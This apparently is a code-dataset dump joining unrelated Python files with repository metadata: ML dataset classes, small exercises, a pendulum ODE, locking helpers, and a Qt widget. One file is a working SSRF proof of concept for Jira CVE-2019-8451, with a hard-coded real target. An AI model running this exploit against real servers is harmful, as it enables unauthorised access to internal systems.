'build/examples/wireless/ns3.27-ofdm-he-validation-debug', 'build/examples/wireless/ns3.27-he-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-multi-tos-debug', 'build/examples/wireless/ns3.27-wifi-backward-compatibility-debug', 'build/scratch/ns3.27-scratch-simulator-debug', 'build/scratch/subdir/ns3.27-subdir-debug']
# Scripts that are runnable.
ns3_runnable_scripts = ['csma-bridge.py', 'sample-simulator.py', 'wifi-olsr-flowmon.py', 'simple-routing-ping6.py', 'first.py', 'second.py', 'third.py', 'mixed-wired-wireless.py', 'wifi-ap.py']
| 1,413.111111 | 12,438 | 0.787231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,229 | 0.961551 |
441d1598d9cc31eb5ebaa68b12f30240e2830d64 | 16,473 | py | Python | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn.functional as F
from scipy.sparse import coo_matrix
from sklearn.preprocessing import StandardScaler
from torch.utils.data import Dataset
from torch_geometric.data import InMemoryDataset, Data, Batch
from tqdm.auto import tqdm
from utils.data_utils import window_data_sorted, add_age_gender
class GraphDataset(InMemoryDataset):
"""
Dataset to use for graph neural networks.
"""
def __init__(self, root='/data/home/efridgeirsson/projects/dementia/data/sequence_dementia'):
super(GraphDataset, self).__init__(root)
self.data, self.slices = torch.load(self.processed_paths[0])
self.labels = self.data.y
@property
def num_features(self):
return len(self.data.x.unique())
@property
def raw_file_names(self):
return ['python_data']
@property
def processed_file_names(self):
return ['dementia.dataset']
def download(self):
pass
def process(self):
data = torch.load(self.raw_paths[0])
old_covariate_ids = data['map'].oldCovariateId
covariate_ref = data['covariateRef']
feature_names = covariate_ref[covariate_ref.covariateId.isin(old_covariate_ids)].covariateName.values
window_lengths = (30, 180, 365)
feature_matrix_counts, windowed_feature_names = window_data_sorted(
window_lengths=list(window_lengths),
feature_matrix=data['data'].coalesce(),
all_feature_names=feature_names)
feature_matrix_counts = feature_matrix_counts.T
feature_matrix_counts.data = np.clip(feature_matrix_counts.data, 0, 1) # counts to binary
feature_matrix_counts, windowed_feature_names = add_age_gender(feature_matrix_counts,
data['nonTemporalData'],
windowed_feature_names,
age_normalized=False)
train_index = data['population'][data['population']['index'] >= 0].index.values
test_index = data['population'][data['population']['index'] < 0.0].index.values
encounter_data = feature_matrix_counts[:, :-4]
demographic_data = feature_matrix_counts[:, -4:].toarray()
scaler = StandardScaler()
demographic_data[train_index, :-1] = scaler.fit_transform(demographic_data[train_index, :-1])
demographic_data[test_index, :-1] = scaler.transform(demographic_data[test_index, :-1])
outcomes = torch.as_tensor(data['population'].outcomeCount.values, dtype=torch.float32)
demographic_data = torch.as_tensor(demographic_data, dtype=torch.float32)
patients = [p for p in range(encounter_data.shape[0])]
data_list = self.process_patient(patients, demographic_data, encounter_data, outcomes)
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
@staticmethod
def process_patient(patient_idxs, demographic_data=None, encounter_data=None, outcomes=None):
data = []
for patient_idx in tqdm(patient_idxs):
patient_data = encounter_data[patient_idx, :].toarray()
source_nodes = torch.as_tensor(patient_data.nonzero()[1], dtype=torch.long)
num_nodes = len(source_nodes)
source_nodes = source_nodes[None, :]
normalized_source_nodes = torch.as_tensor((range(len(source_nodes.unique()))))
edge_index = torch.cat((normalized_source_nodes.repeat(1, num_nodes),
normalized_source_nodes.repeat(num_nodes, 1).transpose(0, 1).contiguous().view(
(1, num_nodes ** 2))), dim=0)
# add extra node for classification
output_nodes = torch.cat((source_nodes[0, :], torch.as_tensor([patient_data.shape[1]])))
output_nodes = output_nodes[None, :]
normalized_output_nodes = torch.as_tensor((range(len(output_nodes.unique()))))
output_edge_index = torch.cat((normalized_output_nodes.repeat(1, num_nodes + 1),
normalized_output_nodes.repeat(num_nodes + 1, 1).transpose(0,
1).contiguous().view(
(1, (num_nodes + 1) ** 2))), dim=0)
dem_data = demographic_data[patient_idx, :]
y = outcomes[patient_idx]
data.append(Data(x=output_nodes.transpose(0, 1), edge_index=edge_index.long(),
output_edge_index=output_edge_index.long(), y=y,
demographic=dem_data[None, :]))
return data
def graph_collate(batch):
"""
Collate function to use with graph datasets.
Parameters
----------
batch :
Returns
-------
"""
elem = batch[0]
if isinstance(elem, Data):
batch = Batch.from_data_list(batch)
return batch, batch.y
class SARDData(Dataset):
"""
Dataset class used for the original SARD implementation.
"""
def __init__(self, indices, non_temporal, train_indices, outcomes, linear_predictions=None,
distill=True):
"""
Parameters
----------
indices : dict with train, val and test indices
outcomes : outcome labels
linear_predictions : predictions from previous model to distill
distill : if run for distillation or not, if distillation then get_item returns also predictions
of already fit model
"""
self.distill = distill
self.outcomes = outcomes
self.linear_predictions = linear_predictions
self.indices = indices
# fix r to py
non_temporal.rowIdPython = non_temporal.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal[non_temporal.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
ages = scaler.transform(ages)
# other covariates
other_df = non_temporal[non_temporal.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(ages)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
def __len__(self):
return len(self.indices)
def __getitem__(self, item):
if self.distill:
return (self.indices[item], self.num[item]), (
self.outcomes[self.indices[item]], self.linear_predictions[self.indices[item]])
else:
return (self.indices[item], self.num[item]), self.outcomes[self.indices[item]]
class VisitSequenceWithLabelDataset(Dataset):
"""
Dataset class that uses lists of lists
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=False):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
# fix r to py
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.train_indices = train_indices
self.num = torch.cat([ages, not_age[:, None]], dim=1)
n_visits = [len(v) for v in visits]
self.max_visits = np.percentile(n_visits, 99).astype(int)
self.num_features = num_features
self.visits = torch.vstack(
[F.pad(torch.as_tensor(v, dtype=torch.long), (0, self.max_visits - len(v))) for v in visits])
self.seqs = []
self.lengths = []
for i, (seq, label) in tqdm(enumerate(zip(seqs, labels))):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
if len(sequence) < self.max_visits:
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(self.max_visits, num_features)))
self.lengths.append(len(sequence))
else:
ix = np.array(row) < self.max_visits # truncate to max visits
self.seqs.append(
coo_matrix((np.array(val, dtype=np.float32)[ix], (np.array(row)[ix], np.array(col)[ix])),
shape=(self.max_visits, num_features)))
self.lengths.append(self.max_visits)
self.labels = torch.as_tensor(labels, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class DistillDataset(VisitSequenceWithLabelDataset):
"""
Dataset class for the distillation where I needed to add the predictions from the teacher model
"""
def __init__(self, linear_predictions=None, distill=True, **kwargs):
super(DistillDataset, self).__init__(**kwargs)
self.distill = distill
self.linear_predictions = torch.as_tensor(linear_predictions.values, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
if self.distill:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.linear_predictions[index], \
self.labels[index], \
self.lengths[index], self.visits[index]
else:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class RETAIN_dataset(Dataset):
"""
RETAIN is an RNN and so doesn't need to pad the input but can work with variable length sequences so I used
this class that doesn't pad the input.
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=True):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
# fix r to py
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
age_maxes = torch.max(ages[train_indices], dim=0).values
ages = ages / age_maxes
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
self.visits = visits
self.seqs = []
self.lengths = []
for i, (seq, label) in enumerate(zip(seqs, labels)):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(len(sequence), num_features)))
self.lengths.append(len(sequence))
self.labels = torch.as_tensor(labels, dtype=torch.long)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
def pad(batch):
"""
Collate function that I use with RETAIN and the vanilla Transformer.
Parameters
----------
batch :
Returns
-------
"""
batch_split = list(zip(*batch))
seqs, num, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], batch_split[4]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
torch.as_tensor(targs, dtype=torch.float32)
def distill_pad(batch):
"""
Collate function I use when distilling
Parameters
----------
batch :
Returns
-------
"""
batch_split = list(zip(*batch))
seqs, num, preds, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], \
batch_split[4], batch_split[5]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
[torch.as_tensor(targs, dtype=torch.float32), torch.as_tensor(preds, dtype=torch.float32)]
| 40.573892 | 123 | 0.611728 | 14,468 | 0.878286 | 0 | 0 | 2,053 | 0.124628 | 0 | 0 | 3,112 | 0.188915 |
441ded704ad1f58469e577a15c12086c94e18f8c | 1,104 | py | Python | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | null | null | null | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | 1 | 2020-10-16T23:26:41.000Z | 2020-10-16T23:26:41.000Z | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | null | null | null | import random
title = 'par ou ímpar'.upper()
print('~~' * 10)
print(f'\033[7;30m{title:^20}\033[m')
print('~~' * 10)
# poi = par ou impar
# vop = vitoria ou perda
poi = vop = ''
cont = 0
while True:
cont += 1
escolha_numero = int(input('Digite um número: '))
escolha_parinpar = str(input('Par ou Impar[P/I]: ')).strip().upper()[0]
en = escolha_numero
epi = escolha_parinpar
# npc = numero do pc
npc = random.randint(1, 100)
soma = npc + en
if soma % 2 == 0:
poi = 'par'
else:
poi = 'ímpar'
if soma % 2 == 0 and epi in 'Pp' or soma % 2 != 0 and epi in 'Ii':
vop = '\033[1;32mganhou\033[m'
else:
vop = '\033[1;31mperdeu\033[m'
break
print(f'O numero escolhido pelo pc foi : {npc}')
print(f'A soma foi: \033[1;33m{soma}\033[m')
print(f'Você {vop}, deu \033[1;33m{poi}\033[m')
print('---' * 10)
print(f'O numero escolhido pelo pc foi : {npc}')
print(f'A soma foi: \033[1;33m{soma}\033[m')
if cont > 1:
print(f'Depois de {cont - 1} vezes seguidas, ', end='')
print(f'Você {vop}, deu \033[1;33m{poi}')
| 29.837838 | 75 | 0.567935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 509 | 0.458972 |
441ec5d59d9d3a65610332b574a805f37375ef36 | 730 | py | Python | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 10 | 2016-07-06T13:25:11.000Z | 2022-02-23T14:35:24.000Z | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 29 | 2017-07-12T16:14:04.000Z | 2021-02-15T04:30:39.000Z | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 5 | 2018-10-09T08:45:14.000Z | 2021-09-07T21:01:23.000Z | #! /usr/bin/env python
# -*- coding: utf8 -*-
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint # use Runge-Kutta 4
def pend(y, t, b, c): # function definition
"""Gives 2D vector dy/dt as function of y and t, with parameters b and c."""
return np.array([y[1], -b*y[1] - c*np.sin(y[0])])
b, c = 0.25, 5.0 # tuple assignment
y0 = np.array([np.pi - 0.1, 0.0])
t = np.linspace(0, 10, 101) # on [0,10] with 101 points
sol = odeint(pend, y0, t, args=(b, c))
plt.plot(t, sol[:, 0], 'b', label=r'$\theta(t)$') # blue
plt.plot(t, sol[:, 1], 'g', label=r'$\omega(t)$') # green
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.savefig("figures/Pendulum_solution.png")
plt.show()
| 27.037037 | 80 | 0.617808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 292 | 0.4 |
441fbe95d0f4a6ebbd262b36d8e02ea09ad5d0b7 | 417 | py | Python | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 2 | 2019-06-23T07:17:30.000Z | 2019-07-06T15:15:42.000Z | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | null | null | null | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 1 | 2019-06-23T07:17:43.000Z | 2019-06-23T07:17:43.000Z | # Arithmetic progression
# A + (A+B) + (A+2B) + (A+3B) + ... + (A+(C-1)B))
def main():
N = int(input("data:\n"))
l = []
for x in range(0,N):
a,b,c = input().split(" ")
a,b,c = int(a),int(b),int(c)
s = 0
for each in range(0,c):
s += a + (b*each)
l.append(s)
print("\nanswer:")
for each in l:
print(each, end=" ")
main()
| 23.166667 | 50 | 0.402878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.242206 |
441fc3bc46c6ecde088567b44799291211ec1438 | 480 | py | Python | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 5 | 2020-07-23T14:40:17.000Z | 2021-01-14T09:07:43.000Z | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 49 | 2020-07-20T15:25:28.000Z | 2021-03-12T22:09:07.000Z | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 3 | 2020-10-07T14:08:53.000Z | 2021-03-12T22:01:19.000Z | import pytest
def test_image_checksum(image_factory):
# Use "build" strategy, so database is not required
image = image_factory.build()
image.compute_checksum()
assert image.checksum is not None
@pytest.mark.django_db
def test_image_rest_retrieve(api_client, image):
resp = api_client.get(f'/api/v1/images/{image.id}/')
assert resp.status_code == 200
# Inspect .data to avoid parsing the response content
assert resp.data['name'] == image.name
| 28.235294 | 57 | 0.727083 | 0 | 0 | 0 | 0 | 264 | 0.55 | 0 | 0 | 139 | 0.289583 |
441fd066a3b9ceec8854e7357e20db9ea179837b | 1,785 | py | Python | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 14 | 2015-03-25T08:31:02.000Z | 2022-03-31T10:58:40.000Z | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 3 | 2015-02-07T16:00:01.000Z | 2015-10-07T11:39:27.000Z | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 6 | 2015-02-06T16:43:05.000Z | 2020-02-18T13:43:31.000Z | import threading
__all__ = ["acquire_fork", "acquire_lock", "release_fork", "release_lock"]
class TwoExclusiveResourcesDispatcher(object):
def __init__(self):
self.FirstResourceUsage = 0
self.SecondResourceUsage = 0
self.lock = threading.Lock()
self.FirstResourceEvent = threading.Condition(self.lock)
self.SecondResourceEvent = threading.Condition(self.lock)
def AcquireFirstResource(self):
with self.lock:
while self.SecondResourceUsage > 0:
self.SecondResourceEvent.wait()
self.FirstResourceUsage += 1
def ReleaseFirstResource(self):
with self.lock:
if self.FirstResourceUsage <= 0:
raise RuntimeError("try to release already released object")
self.FirstResourceUsage -= 1
if self.FirstResourceUsage == 0:
self.FirstResourceEvent.notifyAll()
def AcquireSecondResource(self):
with self.lock:
while self.FirstResourceUsage > 0:
self.FirstResourceEvent.wait()
self.SecondResourceUsage += 1
def ReleaseSecondResource(self):
with self.lock:
if self.SecondResourceUsage <= 0:
raise RuntimeError("try to release already released object")
self.SecondResourceUsage -= 1
if self.SecondResourceUsage == 0:
self.SecondResourceEvent.notifyAll()
_ForkLockDispatcher = TwoExclusiveResourcesDispatcher()
def acquire_fork():
_ForkLockDispatcher.AcquireFirstResource()
def release_fork():
_ForkLockDispatcher.ReleaseFirstResource()
def acquire_lock():
_ForkLockDispatcher.AcquireSecondResource()
def release_lock():
_ForkLockDispatcher.ReleaseSecondResource()
| 30.254237 | 76 | 0.664986 | 1,355 | 0.759104 | 0 | 0 | 0 | 0 | 0 | 0 | 136 | 0.07619 |
4423940e7bf16fa7a158c1ac06a6349871fe59a2 | 2,410 | py | Python | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | """
Various error handling helpers
See https://beepb00p.xyz/mypy-error-handling.html#kiss for more detail
"""
from itertools import tee
from typing import Union, TypeVar, Iterable, List, Tuple, Type
T = TypeVar('T')
E = TypeVar('E', bound=Exception) # TODO make covariant?
ResT = Union[T, E]
Res = ResT[T, Exception]
def unwrap(res: Res[T]) -> T:
if isinstance(res, Exception):
raise res
else:
return res
def echain(ex: E, cause: Exception) -> E:
ex.__cause__ = cause
return ex
def split_errors(l: Iterable[ResT[T, E]], ET: Type[E]) -> Tuple[Iterable[T], Iterable[E]]:
# TODO would be nice to have ET=Exception default?
vit, eit = tee(l)
# TODO ugh, not sure if I can reconcile type checking and runtime and convince mypy that ET and E are the same type?
values: Iterable[T] = (
r # type: ignore[misc]
for r in vit
if not isinstance(r, ET))
errors: Iterable[E] = (
r
for r in eit
if isinstance(r, ET))
# TODO would be interesting to be able to have yield statement anywehere in code
# so there are multiple 'entry points' to the return value
return (values, errors)
def sort_res_by(items: Iterable[ResT], key) -> List[ResT]:
"""
The general idea is: just alaways carry errors with the entry that precedes them
"""
# TODO ResT object should hold exception class?...
group = []
groups = []
for i in items:
if isinstance(i, Exception):
group.append(i)
else:
groups.append((i, group))
group = []
results = []
for v, errs in sorted(groups, key=lambda p: key(p[0])):
results.extend(errs)
results.append(v)
results.extend(group)
return results
def test_sort_res_by() -> None:
class Exc(Exception):
def __eq__(self, other):
return self.args == other.args
ress = [
Exc('first'),
Exc('second'),
5,
3,
Exc('xxx'),
2,
1,
Exc('last'),
]
results = sort_res_by(ress, lambda x: x) # type: ignore
assert results == [
1,
Exc('xxx'),
2,
3,
Exc('first'),
Exc('second'),
5,
Exc('last'),
]
results2 = sort_res_by(ress + [0], lambda x: x) # type: ignore
assert results2 == [Exc('last'), 0] + results[:-1]
| 24.1 | 120 | 0.573444 | 97 | 0.040249 | 0 | 0 | 0 | 0 | 0 | 0 | 693 | 0.287552 |
4426bbfc28bdebbc507707d96ca993bfc6cb31e2 | 1,158 | py | Python | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "no-check",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "https://jira.liulishuo.work"
ssrf_poc(url, ssrf_url)
| 28.95 | 112 | 0.585492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 561 | 0.484456 |
442b82682f3eee1189a613f243e844bcbfce1414 | 62 | py | Python | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit test package for statikos."""
| 20.666667 | 37 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.967742 |
442cb0c494deec67f842f872720e741951f3f855 | 867 | py | Python | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | 1 | 2020-07-24T20:04:47.000Z | 2020-07-24T20:04:47.000Z | # Copyright 2013 Google Inc. All Rights Reserved.
"""Provide commands for managing SSL certificates of Cloud SQL instances."""
from googlecloudsdk.calliope import base
class SslCerts(base.Group):
"""Provide commands for managing SSL certificates of Cloud SQL instances.
Provide commands for managing SSL certificates of Cloud SQL instances,
including creating, deleting, listing, and getting information about
certificates.
"""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
Args:
parser: An argparse parser that you can use it to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'--instance',
'-i',
required=True,
help='Cloud SQL instance ID.')
| 27.967742 | 77 | 0.701269 | 693 | 0.799308 | 0 | 0 | 419 | 0.483276 | 0 | 0 | 663 | 0.764706 |
442f2755025e74454cf096f990e2bed69c6dc5a7 | 5,981 | py | Python | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | from PySide2.QtWidgets import QWidget
from SciDataTool.GUI.WVectorSelector.Ui_WVectorSelector import Ui_WVectorSelector
from PySide2.QtCore import Signal
from PySide2.QtGui import QStandardItem
COMP_DICT = {
"radial": "radial",
"circumferential": "tangential",
"axial": "axial",
"x-axis component": "comp_x",
"y-axis component": "comp_y",
"z-axis component": "comp_z",
}
REV_COMP_DICT = {
"radial": "radial",
"tangential": "circumferential",
"axial": "axial",
"comp_x": "x-axis component",
"comp_y": "y-axis component",
"comp_z": "z-axis component",
}
class WVectorSelector(Ui_WVectorSelector, QWidget):
"""Widget to select how to export the data"""
refreshComponent = Signal()
def __init__(self, parent=None):
"""Initialize the UI and linking buttons to their methods
Parameters
----------
self : WExport
a WVectorSelector object
parent : QWidget
The parent widget
"""
# Build the interface according to the .ui file
QWidget.__init__(self, parent=parent)
self.setupUi(self)
self.c_component.currentTextChanged.connect(self.update_needed)
self.c_referential.hide()
self.in_referential.hide()
# self.c_referential.currentTextChanged.connect(self.update_needed)
self.component_selected = None
self.component_list = list()
def get_component_selected(self):
"""Getting the component selected
Parameters
----------
self : WExport
a WVectorSelector object
"""
return COMP_DICT[self.c_component.currentText()]
def set_component(self, component_selected):
"""Method that set the component selected according to the input of the user (auto-plot)
Parameters
----------
self : DDataPlotter
a DDataPlotter object
component_selected : str
Component to select
"""
# Setting the combobox with the right component
if component_selected in self.component_list:
self.c_component.setCurrentIndex(
self.component_list.index(component_selected)
)
else:
print(
"WARNING : Trying to set the vector to "
+ component_selected
+ " a component which is not available. Setting to default component"
)
self.c_component.setCurrentIndex(1)
def update(self, data):
"""Updating the combobox according to the components store in the VectorField
Parameters
----------
self : WExport
a WVectorSelector object
data : VectorField
the object that we want to plot
"""
comp_stored = data.components.keys()
self.blockSignals(True)
self.c_component.clear()
self.c_component.addItems([REV_COMP_DICT[comp] for comp in comp_stored])
model = self.c_component.model()
if "radial" in comp_stored or "tangential" in comp_stored:
item = QStandardItem("Polar coordinates")
font = item.font()
font.setBold(True)
item.setFont(font)
item.setEnabled(False)
model.insertRow(0, item)
try:
